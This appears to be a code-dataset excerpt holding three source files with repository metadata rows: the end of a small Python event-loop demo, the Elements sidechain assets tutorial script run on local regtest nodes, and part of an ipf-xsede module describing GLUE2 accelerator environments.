probably be called from an event callback.
"""
self._running = False
if __name__ == '__main__':
loop = EventLoop()
@loop.add_timer(5, repeat=True)
def timeout():
print 'No new line in 5 seconds. Stopping now.'
loop.stop()
@loop.line_reader(sys.stdin)
def new_line(line):
timeout.reset()
print 'Echo:', line.strip()
print 'Echoing lines.'
loop.run()
print 'Exit.'
|
bsd-3-clause
| -3,009,963,854,136,994,300
| 33.632948
| 80
| 0.562881
| false
| 4.717717
| false
| false
| false
|
ElementsProject/elements
|
contrib/assets_tutorial/assets_tutorial.py
|
1
|
17042
|
#!/usr/bin/env python3
from test_framework.authproxy import AuthServiceProxy, JSONRPCException
import os
import random
import sys
import time
import subprocess
import shutil
from decimal import Decimal
ELEMENTSPATH=""
BITCOINPATH=""
if len(sys.argv) == 2:
ELEMENTSPATH=sys.argv[0]
BITCOINPATH=sys.argv[1]
else:
ELEMENTSPATH="./src"
BITCOINPATH="./../bitcoin/src"
def startbitcoind(datadir, conf, args=""):
subprocess.Popen((BITCOINPATH+"/bitcoind -datadir="+datadir+" "+args).split(), stdout=subprocess.PIPE)
return AuthServiceProxy("http://"+conf["rpcuser"]+":"+conf["rpcpassword"]+"@127.0.0.1:"+conf["regtest.rpcport"])
def startelementsd(datadir, conf, args=""):
subprocess.Popen((ELEMENTSPATH+"/elementsd -datadir="+datadir+" "+args).split(), stdout=subprocess.PIPE)
return AuthServiceProxy("http://"+conf["rpcuser"]+":"+conf["rpcpassword"]+"@127.0.0.1:"+conf["elementsregtest.rpcport"])
def loadConfig(filename):
conf = {}
with open(filename, encoding="utf8") as f:
for line in f:
if len(line) == 0 or line[0] == "#" or len(line.split("=")) != 2:
continue
conf[line.split("=")[0]] = line.split("=")[1].strip()
conf["filename"] = filename
return conf
def sync_all(e1, e2):
totalWait = 10
while e1.getblockcount() != e2.getblockcount() or len(e1.getrawmempool()) != len(e2.getrawmempool()):
totalWait -= 1
if totalWait == 0:
raise Exception("Nodes cannot sync blocks or mempool!")
time.sleep(1)
return
# Preparations
# Make data directories for each daemon
b_datadir="/tmp/"+''.join(random.choice('0123456789ABCDEF') for i in range(5))
e1_datadir="/tmp/"+''.join(random.choice('0123456789ABCDEF') for i in range(5))
e2_datadir="/tmp/"+''.join(random.choice('0123456789ABCDEF') for i in range(5))
os.makedirs(b_datadir)
os.makedirs(e1_datadir)
os.makedirs(e2_datadir)
print("Bitcoin datadir: "+b_datadir)
print("Elements1 datadir: "+e1_datadir)
print("Elements2 datadir: "+e2_datadir)
# Also configure the nodes by copying the configuration files from
# this directory (and read them back for arguments):
shutil.copyfile("contrib/assets_tutorial/bitcoin.conf", b_datadir+"/bitcoin.conf")
shutil.copyfile("contrib/assets_tutorial/elements1.conf", e1_datadir+"/elements.conf")
shutil.copyfile("contrib/assets_tutorial/elements2.conf", e2_datadir+"/elements.conf")
bconf = loadConfig("contrib/assets_tutorial/bitcoin.conf")
e1conf = loadConfig("contrib/assets_tutorial/elements1.conf")
e2conf = loadConfig("contrib/assets_tutorial/elements2.conf")
# Startup
# Cannot start since bitcoind isn't running and validatepegin is set
# elementsd attempts to connect to bitcoind to check if peg-in transactions
# are confirmed in the Bitcoin chain.
e1 = startelementsd(e1_datadir, e1conf)
time.sleep(2)
try:
e1.getinfo()
raise AssertionError("This should fail unless working bitcoind can be reached via JSON RPC")
except:
pass
# Start bitcoind, then elementsd. As long as bitcoind is in RPC warmup, elementsd will connect
bitcoin = startbitcoind(b_datadir, bconf)
e1 = startelementsd(e1_datadir, e1conf)
e2 = startelementsd(e2_datadir, e2conf)
time.sleep(3)
# Alternatively, you can set validatepegin=0 in their configs and not
# run the bitcoin node, but it is necessary for fully validating the two way peg.
# Regtest chain starts with 21M bitcoins as OP_TRUE which the wallet
# understands. This is useful for testing basic functionality and for
# blockchains that have no pegging functionality. A fee currency is required
# for anti-DoS purposes as well as asset issuance, which consumes inputs for entropy.
# In Elements there is no block subsidy. In a production sidechain it can
# be configured to start with no outputs, necessitating peg-in functionality
# for asset issuance.
e1.getwalletinfo()
# In regtest mining "target" is OP_TRUE since we have not set `-signblockscript` argument
# Generate simply works.
e1.generatetoaddress(101, e1.getnewaddress())
sync_all(e1, e2)
# WALLET
# First, send all anyone-can-spend coins to e1 then split so balances are even
e1.sendtoaddress(e1.getnewaddress(), 21000000, "", "", True)
e1.generatetoaddress(101, e1.getnewaddress())
sync_all(e1, e2)
e1.sendtoaddress(e2.getnewaddress(), 10500000, "", "", False)
e1.generatetoaddress(101, e1.getnewaddress())
sync_all(e1, e2)
# Funds should now be evenly split between the two wallets
e1.getwalletinfo()
e2.getwalletinfo()
# Have e2 send coins to itself using a blinded Elements address
# Blinded addresses start with `CTE`, unblinded `2`
addr = e2.getnewaddress()
# How do we know it's blinded? Check for blinding key, unblinded address.
e2.getaddressinfo(addr)
# Basic blinded send
txid = e2.sendtoaddress(addr, 1)
e2.generatetoaddress(1, e1.getnewaddress())
sync_all(e1, e2)
# Now let's examine the transaction, both in wallet and without
# In-wallet, take a look at blinding information
e2.gettransaction(txid)
# e1 doesn't have in wallet since it's unrelated
try:
e1.gettransaction(txid)
raise Exception("Transaction should not be in wallet")
except JSONRPCException:
pass
# Get public info, see blinded ranges, etc
e1.getrawtransaction(txid, 1)
# Now let's import the private key to attempt a spend
e1.importprivkey(e2.dumpprivkey(addr))
# We can't see output value info though
# and can not send.
e1.gettransaction(txid)
# And it won't show in balance or known outputs
e1.getwalletinfo()
# Amount for transaction is unknown, so it is not shown in listunspent.
e1.listunspent(1, 1)
# Solution: Import blinding key
e1.importblindingkey(addr, e2.dumpblindingkey(addr))
# Check again, funds should show
e1.getwalletinfo()
e1.listunspent(1, 1)
e1.gettransaction(txid)
# Let's build a blinded 2-of-2 multisig p2sh address
# 1) Get unblinded addresses from each participant
addr1 = e1.getaddressinfo(e1.getnewaddress())["unconfidential"]
addr2 = e2.getaddressinfo(e2.getnewaddress())["unconfidential"]
# 2) Get blinding keys, private and public
addrinfo1 = e1.getaddressinfo(e1.getnewaddress())
addrinfo2 = e2.getaddressinfo(addr2)
blindingkey = e1.dumpblindingkey(addrinfo1["address"])
blindingpubkey = addrinfo1["confidential_key"]
# 3) Make multisig address like usual
multisig = e1.createmultisig(2, [addrinfo1["pubkey"], addrinfo2["pubkey"]])
# 4) Blind the address using the blinding pubkey
blinded_addr = e1.createblindedaddress(multisig["address"], blindingpubkey)
e1.importaddress(multisig["redeemScript"], "", True, True) # Make sure p2sh addr is added
e2.importaddress(multisig["redeemScript"], "", True, True)
e1.importaddress(blinded_addr)
e2.importaddress(blinded_addr)
# 5) Now the address can be funded, though e2 will not be able to see values
txid = e1.sendtoaddress(blinded_addr, 1)
sync_all(e1, e2)
e2.gettransaction(txid, True)
# 6) Import the blinding privkey and decode the values
e2.importblindingkey(blinded_addr, blindingkey)
e2.gettransaction(txid, True)
# ASSETS
# Many of the RPC calls have added asset type or label
# arguments and reveal alternative asset information. With no argument all are listed:
e1.getwalletinfo()
# Notice we now see "bitcoin" as an asset. This is the asset label for the hex for "bitcoin" which can be discovered:
e1.dumpassetlabels()
# We can also issue our own assets, 1 asset and 1 reissuance token in this case
issue = e1.issueasset(1, 1)
asset = issue["asset"]
# From there you can look at the issuances you have in your wallet
e1.listissuances()
# If you gave `issueasset` a reissuance token argument greater than 0
# you can also reissue the base asset
e1.reissueasset(asset, 1)
# or make another different unblinded asset issuance, with only reissuance tokens initially
e1.issueasset(0, 1, False)
# Then two issuances for that particular asset will show
e1.listissuances(asset)
# To label any asset add a new argument like this to your elements.conf file
# then restart your daemon:
assetentry = "-assetdir="+asset+":namedasset"
# Wallet labels have no consensus meaning, only local node/wallet meaning
sync_all(e1, e2)
e1.stop()
time.sleep(5)
# Restart with a new asset label
e1 = startelementsd(e1_datadir, e1conf, assetentry)
time.sleep(5)
e1.getwalletinfo()
# To send issued assets, add an additional argument to sendtoaddress using the hex or label
e1.sendtoaddress(address=e2.getnewaddress(), amount=1, assetlabel="namedasset")
# Reissuance tokens can also be sent like any other asset
e1.sendtoaddress(address=e2.getnewaddress(), amount=1, assetlabel=issue["token"])
sync_all(e1, e2)
# e2 wallet doesn't know about label, just an unnamed asset
e2.getwalletinfo()["unconfirmed_balance"][asset]
e2.generatetoaddress(1, e2.getnewaddress())
sync_all(e1, e2)
# e2 may not know about the issuance for the transaction sending it the new asset
e2.listissuances()
# let's import an associated address (so the wallet captures the issuance transaction) and rescan
txid = issue["txid"]
addr = e1.gettransaction(txid)["details"][0]["address"]
e2.importaddress(addr)
# e2 now sees issuance, but doesn't know amounts as they are blinded
e2.listissuances()
# We need to import the issuance blinding key. We refer to issuances by their txid/vin pair
# as there is only one per input
vin = issue["vin"]
issuekey = e1.dumpissuanceblindingkey(txid, vin)
e2.importissuanceblindingkey(txid, vin, issuekey)
# Now e2 can see issuance amounts and blinds
e2.listissuances()
# Since it was also sent a reissuance token, it can reissue the base asset
e2.reissueasset(issue["asset"], 5)
# Reissuing reissuance tokens is currently not supported
try:
e2.reissueasset(issue["token"], 1)
except JSONRPCException:
pass
# For de-issuance, we can send assets or issuance tokens to an OP_RETURN output, provably burning them
e2.destroyamount(issue["asset"], 5)
# BLOCKSIGNING
# Recall blocksigning is OP_TRUE
e1.generatetoaddress(1, e1.getnewaddress())
sync_all(e1, e2)
# Let's set it to something more interesting... 2-of-2 multisig
# First lets get some keys from both clients to make our block "challenge"
addr1 = e1.getnewaddress()
addr2 = e2.getnewaddress()
valid1 = e1.getaddressinfo(addr1)
pubkey1 = valid1["pubkey"]
valid2 = e2.getaddressinfo(addr2)
pubkey2 = valid2["pubkey"]
key1 = e1.dumpprivkey(addr1)
key2 = e2.dumpprivkey(addr2)
e1.stop()
e2.stop()
time.sleep(5)
# Now filled with the pubkeys as 2-of-2 checkmultisig
signblockarg="-signblockscript=5221"+pubkey1+"21"+pubkey2+"52ae"
# Anti-DoS argument, custom chain default is ~1 sig so let's make it at least 2 sigs
blocksign_max_size="-con_max_block_sig_size=150"
dyna_deploy_start="-con_dyna_deploy_start=0"
extra_args=signblockarg+" "+blocksign_max_size+" "+dyna_deploy_start
# Wipe out datadirs, start over
shutil.rmtree(e1_datadir)
shutil.rmtree(e2_datadir)
os.makedirs(e1_datadir)
os.makedirs(e2_datadir)
# Copy back config files
shutil.copyfile("contrib/assets_tutorial/elements1.conf", e1_datadir+"/elements.conf")
shutil.copyfile("contrib/assets_tutorial/elements2.conf", e2_datadir+"/elements.conf")
e1 = startelementsd(e1_datadir, e1conf, extra_args)
e2 = startelementsd(e2_datadir, e2conf, extra_args)
time.sleep(5)
sync_all(e1, e2)
# Now import signing keys
e1.importprivkey(key1)
e2.importprivkey(key2)
# Generate no longer works, even if keys are in wallet
try:
e1.generatetoaddress(1, e1.getnewaddress())
raise Exception("Generate shouldn't work")
except JSONRPCException:
pass
try:
e2.generatetoaddress(1, e2.getnewaddress())
raise Exception("Generate shouldn't work")
except JSONRPCException:
pass
# Let's propose and accept some blocks, e1 is master!
blockhex = e1.getnewblockhex()
# Unsigned is no good
# 0 before, 0 after
e1.getblockcount() == 0
e1.submitblock(blockhex)
# Still 0
e1.getblockcount() == 0
# Signblock tests validity except block signatures
# This signing step can be outsourced to a HSM signing to enforce business logic of any sort
# See Strong Federations paper
sign1 = e1.signblock(blockhex)
sign2 = e2.signblock(blockhex)
# We now can gather signatures any way you want, combine them into a fully signed block
blockresult = e1.combineblocksigs(blockhex, [sign1[0], sign2[0]])
blockresult["complete"] == True
signedblock = blockresult["hex"]
# Now submit the block, doesn't matter who
e2.submitblock(signedblock)
sync_all(e1, e2)
# We now have moved forward one block!
e1.getblockcount() == 1
e2.getblockcount() == 1
e1.stop()
e2.stop()
time.sleep(5)
# Further Exercises:
# - Make a python script that does round-robin consensus
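# One possible shape for a single signing round, reusing the calls above
# (assuming a list `nodes` of RPC proxies and a `height` counter maintained elsewhere):
#     proposer = nodes[height % len(nodes)]
#     blockhex = proposer.getnewblockhex()
#     sigs = [n.signblock(blockhex)[0] for n in nodes]
#     result = proposer.combineblocksigs(blockhex, sigs)
#     if result["complete"]:
#         proposer.submitblock(result["hex"])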
# Pegging
# Everything pegging related can be done inside the Elements daemon directly, except for
# pegging out. This is due to the multisig pool aka Watchmen that controls the bitcoin
# on the Bitcoin blockchain. That is the easiest part to get wrong, and by far the most
# important as there is no going back if you lose the funds.
# Wipe out datadirs, start over
shutil.rmtree(e1_datadir)
shutil.rmtree(e2_datadir)
os.makedirs(e1_datadir)
os.makedirs(e2_datadir)
# Copy back config files
shutil.copyfile("contrib/assets_tutorial/elements1.conf", e1_datadir+"/elements.conf")
shutil.copyfile("contrib/assets_tutorial/elements2.conf", e2_datadir+"/elements.conf")
fedpegarg="-fedpegscript=5221"+pubkey1+"21"+pubkey2+"52ae"
# Back to OP_TRUE blocks, re-using pubkeys for pegin pool instead
# Keys can be the same or different, doesn't matter
e1 = startelementsd(e1_datadir, e1conf, fedpegarg)
e2 = startelementsd(e2_datadir, e2conf, fedpegarg)
time.sleep(5)
# Mature some outputs on each side
e1.generatetoaddress(101, e1.getnewaddress())
bitcoin.generatetoaddress(101, bitcoin.getnewaddress())
sync_all(e1, e2)
# Now we can actually start pegging in. Examine the pegin address fields
e1.getpeginaddress()
# Changes each time as it's a new sidechain address as well as new "tweak" for the watchmen keys
# mainchain_address : where you send your bitcoin from Bitcoin network
# sidechain_address : where the bitcoin will end up on the sidechain after pegging in
# Each call of this takes the pubkeys defined in the config file, adds a random number to them
# that is essentially the hash of the sidechain_address and other information,
# then creates a new P2SH Bitcoin address from that. We reveal that "tweak" to the functionaries
# during `claimpegin`, then they are able to calculate the necessary private key and control
# funds.
addrs = e1.getpeginaddress()
# Send funds to unique watchmen P2SH address
txid = bitcoin.sendtoaddress(addrs["mainchain_address"], 1)
# Confirmations in Bitcoin are what protects the
# sidechain from becoming fractional reserve during reorgs.
bitcoin.generatetoaddress(101, bitcoin.getnewaddress())
proof = bitcoin.gettxoutproof([txid])
raw = bitcoin.getrawtransaction(txid)
# Attempt claim!
claimtxid = e1.claimpegin(raw, proof, addrs["claim_script"])
sync_all(e1, e2)
# Other node should accept to mempool and mine
e2.generatetoaddress(1, e1.getnewaddress())
sync_all(e1, e2)
# Should see confirmations
"confirmations" in e1.getrawtransaction(claimtxid, 1)
# Pegging Out
# This command would trigger watchmen to send payment to Bitcoin address on mainchain
# The Bitcoin-side functionality is not supported directly in Elements.
# The watchmen will notice this transaction and send the funds from their collective
# wallet.
e1.sendtomainchain(bitcoin.getnewaddress(), 10)
# Exercise(s)
# 1. Implement really dumb/unsafe watchmen to allow pegouts for learning purposes
#    Recover tweak from pegin, add to privkey, combine tweaked pubkeys into a redeemscript, add to Core wallet
# RAW API
# Let's create a basic transaction using the raw api, blind it, sign, and send
# Create a transaction with a single destination output to other wallet
rawtx = e1.createrawtransaction([], {e2.getnewaddress():100})
# Biggest difference compared to Bitcoin is that we have explicit fee outputs
rawtx2 = e1.createrawtransaction([], {e2.getnewaddress():100, e1.getnewaddress():5, "fee":Decimal("0.1")})
# Fee outputs are unblinded, with a scriptPubKey of ""; in other words, ""
# scriptPubKeys are unspendable
# Next we can fund the transaction (which replaces the fee with something more appropriate)
fundedtx = e1.fundrawtransaction(rawtx2)
# Blind
blindedtx = e1.blindrawtransaction(fundedtx["hex"])
# *Warning*: Raw blinding logic can be quite complicated, requiring the use of `ignoreblindfails`
# to avoid having calls fail without manually inspecting transactions in great detail.
# In general any transaction with 2 or more outputs to blind should succeed, so adding additional
# is one strategy to resolve this.
# Sign
signedtx = e1.signrawtransactionwithwallet(blindedtx)
# And send
txid = e1.sendrawtransaction(signedtx["hex"])
sync_all(e1, e2)
e2.gettransaction(txid)
# ADVANCED OPTIONS
# rawblindrawtransaction : blind a raw transaction with no access to a wallet
# -policyasset=<hex> : set network fee asset type to something other than BTC
bitcoin.stop()
e1.stop()
e2.stop()
time.sleep(2)
shutil.rmtree(e1_datadir)
shutil.rmtree(e2_datadir)
|
mit
| -7,510,705,342,911,157,000
| 32.547244
| 124
| 0.756132
| false
| 3.207
| true
| false
| false
|
ericblau/ipf-xsede
|
ipf/glue2/accelerator_environment.py
|
1
|
26893
|
###############################################################################
# Copyright 2011-2014 The University of Texas at Austin #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
###############################################################################
import subprocess
import datetime
import json
import os
import re
import socket
import time
import copy
from xml.dom.minidom import getDOMImplementation
from ipf.data import Data, Representation
from ipf.dt import *
from ipf.error import StepError
from ipf.sysinfo import ResourceName
from ipf.sysinfo import Platform
from .resource import *
from .step import GlueStep
#######################################################################################################################
class AcceleratorEnvironmentsStep(GlueStep):
def __init__(self):
GlueStep.__init__(self)
self.description = "Produces a document containing one or more GLUE 2 AcceleratorEnvironment. For a batch scheduled system, an ExecutionEnivonment is typically a compute node."
self.time_out = 30
self.requires = [ResourceName, Platform]
self.produces = [AcceleratorEnvironments]
self._acceptParameter("queues",
"An expression describing the queues to include (optional). The syntax is a series of +<queue> and -<queue> where <queue> is either a queue name or a '*'. '+' means include '-' means exclude. The expression is processed in order and the value for a queue at the end determines if it is shown.",
False)
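# For example, a queues expression of "+* -debug" (an illustrative value, not
# taken from this file) would publish every queue except 'debug'.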
self.resource_name = None
def run(self):
self.resource_name = self._getInput(ResourceName).resource_name
host_groups = self._run()
if host_groups:
for host_group in host_groups:
host_group.id = "%s.%s" % (host_group.Name, self.resource_name)
host_group.ID = "urn:glue2:AcceleratorEnvironment:%s.%s" % (
host_group.Name, self.resource_name)
host_group.ManagerID = "urn:glue2:ComputingManager:%s" % (
self.resource_name)
self.debug("host_group.id "+host_group.id)
self.debug("host_group.uas " +
str(host_group.UsedAcceleratorSlots))
self._output(AcceleratorEnvironments(self.resource_name, host_groups))
def _shouldUseName(self, hosts):
names = set()
for host in hosts:
names.add(host.Name)
if len(names) == 1 or len(names) < len(hosts):
return True
else:
return False
def _groupHosts(self, hosts):
use_name = self._shouldUseName(hosts)
host_groups = []
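# Merge each host into the first existing group with identical hardware/OS
# attributes: instance and accelerator-slot counts are summed, while the
# load extensions are kept as instance-weighted averages.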
for host in hosts:
for host_group in host_groups:
if host.sameHostGroup(host_group, use_name):
if "UsedAverageLoad" in host.Extension:
host_load = host.Extension["UsedAverageLoad"]
if "UsedAverageLoad" not in host_group.Extension:
host_group.Extension["UsedAverageLoad"] = host_load
else:
host_group_load = host_group.Extension["UsedAverageLoad"]
host_group_load = (host_group_load * host_group.UsedInstances +
host_load * host.UsedInstances) / \
(host_group.UsedInstances + host.UsedInstances)
host_group.Extension["UsedAverageLoad"] = host_group_load
if "AvailableAverageLoad" in host.Extension:
host_load = host.Extension["AvailableAverageLoad"]
if "AvailableAverageLoad" not in host_group.Extension:
host_group.Extension["AvailableAverageLoad"] = host_load
else:
host_group_load = host_group.Extension["AvailableAverageLoad"]
host_group_avail = host_group.TotalInstances - host_group.UsedInstances - \
host_group.UnavailableInstances
host_avail = host.TotalInstances - host.UsedInstances - host.UnavailableInstances
host_group_load = (host_group_load * host_group_avail + host_load * host_avail) / \
(host_group_avail + host_avail)
host_group.Extension["AvailableAverageLoad"] = host_group_load
if "PartiallyUsedInstances" in host.Extension:
if "PartiallyUsedInstances" not in host_group.Extension:
host_group.Extension["PartiallyUsedInstances"] = host.Extension["PartiallyUsedInstances"]
else:
host_group.Extension["PartiallyUsedInstances"] = \
host_group.Extension["PartiallyUsedInstances"] + \
host.Extension["PartiallyUsedInstances"]
host_group.TotalInstances += host.TotalInstances
host_group.UsedInstances += host.UsedInstances
host_group.UnavailableInstances += host.UnavailableInstances
# if host_group.UsedAcceleratorSlots is None:
# host_group.UsedAcceleratorSlots = 0
# if host.UsedAcceleratorSlots is None:
# host.UsedAcceleratorSlots = 0
host_group.UsedAcceleratorSlots += host.UsedAcceleratorSlots
if host_group.TotalAcceleratorSlots is None:
host_group.TotalAcceleratorSlots = 0
host_group.TotalAcceleratorSlots += host.PhysicalAccelerators
host = None
break
if host is not None:
host_groups.append(host)
if not use_name:
host.Name = "NodeType%d" % len(host_groups)
return host_groups
def _run(self):
raise StepError("AcceleratorEnvironmentsStep._run not overriden")
def _goodHost(self, host):
# check that it has gpu information
if host.PhysicalAccelerators == None:
return False
# if the host is associated with a queue, check that it is a good one
if len(host.ShareID) == 0:
return True
for share in host.ShareID:
m = re.search("urn:glue2:ComputingShare:(\S+).%s" %
self.resource_name, share)
if self._includeQueue(m.group(1)):
return True
# if the host is associated with a partition, check that it is a good one
if len(host.Partitions) == 0:
return True
partition_list = host.Partitions.split(',')
for share in partition_list:
if self._includeQueue(share):
return True
return False
#######################################################################################################################
class AcceleratorEnvironment(Resource):
def __init__(self):
Resource.__init__(self)
self.Platform = "unknown" # string (Platform_t)
self.VirtualMachine = None # boolean (ExtendedBoolean)
self.TotalInstances = None # integer
self.UsedInstances = None # integer
self.UnavailableInstances = None # integer
self.PhysicalCPUs = None # integer
self.LogicalCPUs = None # integer
self.CPUMultiplicity = None # integer (CPUMultiplicity)
self.CPUVendor = None # string
self.CPUModel = None # string
self.CPUVersion = None # string
self.CPUClockSpeed = None # integer (MHz)
self.CPUTimeScalingFactor = None # float
self.WallTimeScalingFactor = None # float
self.MainMemorySize = 0 # integer (MB)
self.VirtualMemorySize = None # integer (MB)
self.OSFamily = "unknown" # string (OSFamily)
self.OSName = None # string (OSName)
self.OSVersion = None # string
self.ConnectivityIn = None # boolean (ExtendedBoolean)
self.ConnectivityOut = None # boolean (ExtendedBoolean)
self.NetworkInfo = None # string (NetworkInfo)
# use Manager, Share, Activity from Resource, not ComputingManager, ComputingShare, ComputingActivity
self.ApplicationEnvironmentID = [] # list of string (ID)
self.BenchmarkID = [] # list of string (ID)
# For AcceleratorEnvironment, but kludging here for node purposes
self.Type = "unknown" # string (AccType_t)
self.PhysicalAccelerators = None # integer
self.UsedAcceleratorSlots = None # integer
self.TotalAcceleratorSlots = None # integer
self.LogicalAccelerators = None # integer
self.Vendor = None # string
self.Model = None # string
self.Version = None # string
self.ClockSpeed = None # integer (MHz)
self.Memory = 0 # integer (MB)
self.ComputeCapability = None # string (describes CUDA features)
# set defaults to be the same as the host where this runs
(sysName, nodeName, release, version, machine) = os.uname()
self.Platform = machine
self.OSFamily = sysName.lower()
self.OSName = sysName.lower()
self.OSVersion = release
def __str__(self):
return json.dumps(AcceleratorEnvironmentOgfJson(self).toJson(), sort_keys=True, indent=4)
def sameHostGroup(self, accel_env, useName):
if useName and self.Name != accel_env.Name:
return False
if self.Platform != accel_env.Platform:
return False
if self.PhysicalCPUs != accel_env.PhysicalCPUs:
return False
if self.LogicalCPUs != accel_env.LogicalCPUs:
return False
if self.CPUVendor != accel_env.CPUVendor:
return False
if self.CPUModel != accel_env.CPUModel:
return False
if self.CPUVersion != accel_env.CPUVersion:
return False
if self.CPUClockSpeed != accel_env.CPUClockSpeed:
return False
if self.MainMemorySize != accel_env.MainMemorySize:
return False
# if self.VirtualMemorySize != accel_env.VirtualMemorySize:
# return False
if self.OSFamily != accel_env.OSFamily:
return False
if self.OSName != accel_env.OSName:
return False
if self.OSVersion != accel_env.OSVersion:
return False
if len(self.ShareID) != len(accel_env.ShareID):
return False
for share in self.ShareID:
if not share in accel_env.ShareID:
return False
return True
#######################################################################################################################
class AcceleratorEnvironmentTeraGridXml(ResourceTeraGridXml):
data_cls = AcceleratorEnvironment
def __init__(self, data):
ResourceTeraGridXml.__init__(self, data)
def get(self):
return self.toDom().toxml()
def toDom(self):
doc = getDOMImplementation().createDocument("http://info.teragrid.org/glue/2009/02/spec_2.0_r02",
"Entities", None)
root = doc.createElement("AcceleratorEnvironment")
doc.documentElement.appendChild(root)
self.addToDomElement(doc, root)
return doc
def addToDomElement(self, doc, element):
ResourceTeraGridXml.addToDomElement(self, doc, element)
if self.data.Platform is not None:
e = doc.createElement("Platform")
e.appendChild(doc.createTextNode(self.data.Platform))
element.appendChild(e)
if self.data.VirtualMachine is not None:
e = doc.createElement("VirtualMachine")
if self.data.VirtualMachine:
e.appendChild(doc.createTextNode("true"))
else:
e.appendChild(doc.createTextNode("false"))
element.appendChild(e)
if self.data.TotalInstances is not None:
e = doc.createElement("TotalInstances")
e.appendChild(doc.createTextNode(str(self.data.TotalInstances)))
element.appendChild(e)
if self.data.UsedInstances is not None:
e = doc.createElement("UsedInstances")
e.appendChild(doc.createTextNode(str(self.data.UsedInstances)))
element.appendChild(e)
if self.data.UnavailableInstances is not None:
e = doc.createElement("UnavailableInstances")
e.appendChild(doc.createTextNode(
str(self.data.UnavailableInstances)))
element.appendChild(e)
if self.data.PhysicalCPUs is not None:
e = doc.createElement("PhysicalCPUs")
e.appendChild(doc.createTextNode(str(self.data.PhysicalCPUs)))
element.appendChild(e)
if self.data.PhysicalAccelerators is not None:
e = doc.createElement("PhysicalAccelerators")
e.appendChild(doc.createTextNode(
str(self.data.PhysicalAccelerators)))
element.appendChild(e)
if self.data.UsedAcceleratorSlots is not None:
e = doc.createElement("UsedAcceleratorSlots")
e.appendChild(doc.createTextNode(
str(self.data.UsedAcceleratorSlots)))
element.appendChild(e)
if self.data.LogicalCPUs is not None:
e = doc.createElement("LogicalCPUs")
e.appendChild(doc.createTextNode(str(self.data.LogicalCPUs)))
element.appendChild(e)
if self.data.CPUMultiplicity is not None:
e = doc.createElement("CPUMultiplicity")
e.appendChild(doc.createTextNode(self.data.CPUMultiplicity))
element.appendChild(e)
if self.data.CPUVendor is not None:
e = doc.createElement("CPUVendor")
e.appendChild(doc.createTextNode(self.data.CPUVendor))
element.appendChild(e)
if self.data.CPUModel is not None:
e = doc.createElement("CPUModel")
e.appendChild(doc.createTextNode(self.data.CPUModel))
element.appendChild(e)
if self.data.CPUVersion is not None:
e = doc.createElement("CPUVersion")
e.appendChild(doc.createTextNode(self.data.CPUVersion))
element.appendChild(e)
if self.data.CPUClockSpeed is not None:
e = doc.createElement("CPUClockSpeed")
e.appendChild(doc.createTextNode(str(self.data.CPUClockSpeed)))
element.appendChild(e)
if self.data.CPUTimeScalingFactor is not None:
e = doc.createElement("CPUTimeScalingFactor")
e.appendChild(doc.createTextNode(
str(self.data.CPUTimeScalingFactor)))
element.appendChild(e)
if self.data.WallTimeScalingFactor is not None:
e = doc.createElement("WallTimeScalingFactor")
e.appendChild(doc.createTextNode(
str(self.data.WallTimeScalingFactor)))
element.appendChild(e)
if self.data.MainMemorySize is not None:
e = doc.createElement("MainMemorySize")
e.appendChild(doc.createTextNode(str(self.data.MainMemorySize)))
element.appendChild(e)
if self.data.VirtualMemorySize is not None:
e = doc.createElement("VirtualMemorySize")
e.appendChild(doc.createTextNode(str(self.data.VirtualMemorySize)))
element.appendChild(e)
if self.data.OSFamily is not None:
e = doc.createElement("OSFamily")
e.appendChild(doc.createTextNode(self.data.OSFamily))
element.appendChild(e)
if self.data.OSName is not None:
e = doc.createElement("OSName")
e.appendChild(doc.createTextNode(self.data.OSName))
element.appendChild(e)
if self.data.OSVersion is not None:
e = doc.createElement("OSVersion")
e.appendChild(doc.createTextNode(self.data.OSVersion))
element.appendChild(e)
if self.data.ConnectivityIn == None:
e = doc.createElement("ConnectivityIn")
e.appendChild(doc.createTextNode("undefined"))
element.appendChild(e)
elif self.data.ConnectivityIn:
e = doc.createElement("ConnectivityIn")
e.appendChild(doc.createTextNode("true"))
element.appendChild(e)
else:
e = doc.createElement("ConnectivityIn")
e.appendChild(doc.createTextNode("false"))
element.appendChild(e)
if self.data.ConnectivityOut == None:
e = doc.createElement("ConnectivityOut")
e.appendChild(doc.createTextNode("undefined"))
element.appendChild(e)
elif self.data.ConnectivityOut:
e = doc.createElement("ConnectivityOut")
e.appendChild(doc.createTextNode("true"))
element.appendChild(e)
else:
e = doc.createElement("ConnectivityOut")
e.appendChild(doc.createTextNode("false"))
element.appendChild(e)
if self.data.NetworkInfo is not None:
e = doc.createElement("NetworkInfo")
e.appendChild(doc.createTextNode(self.data.NetworkInfo))
element.appendChild(e)
if self.data.ManagerID is not None:
e = doc.createElement("ComputingManager")
e.appendChild(doc.createTextNode(self.data.ManagerID))
element.appendChild(e)
for share in self.data.ShareID:
e = doc.createElement("ComputingShare")
e.appendChild(doc.createTextNode(share))
element.appendChild(e)
for activity in self.data.ActivityID:
e = doc.createElement("ComputingActivity")
e.appendChild(doc.createTextNode(activity))
element.appendChild(e)
for appEnv in self.data.ApplicationEnvironmentID:
e = doc.createElement("ApplicationEnvironment")
e.appendChild(doc.createTextNode(appEnv))
element.appendChild(e)
for benchmark in self.data.BenchmarkID:
e = doc.createElement("Benchmark")
e.appendChild(doc.createTextNode(benchmark))
element.appendChild(e)
#######################################################################################################################
class AcceleratorEnvironmentOgfJson(ResourceOgfJson):
data_cls = AcceleratorEnvironment
def __init__(self, data):
ResourceOgfJson.__init__(self, data)
def get(self):
return json.dumps(self.toJson(), sort_keys=True, indent=4)
def toJson(self):
doc = ResourceOgfJson.toJson(self)
doc["Platform"] = self.data.Platform
if self.data.VirtualMachine is not None:
doc["VirtualMachine"] = self.data.VirtualMachine
if self.data.TotalInstances is not None:
doc["TotalInstances"] = self.data.TotalInstances
if self.data.UsedInstances is not None:
doc["UsedInstances"] = self.data.UsedInstances
if self.data.UnavailableInstances is not None:
doc["UnavailableInstances"] = self.data.UnavailableInstances
if self.data.PhysicalCPUs is not None:
doc["PhysicalCPUs"] = self.data.PhysicalCPUs
if self.data.PhysicalAccelerators is not None:
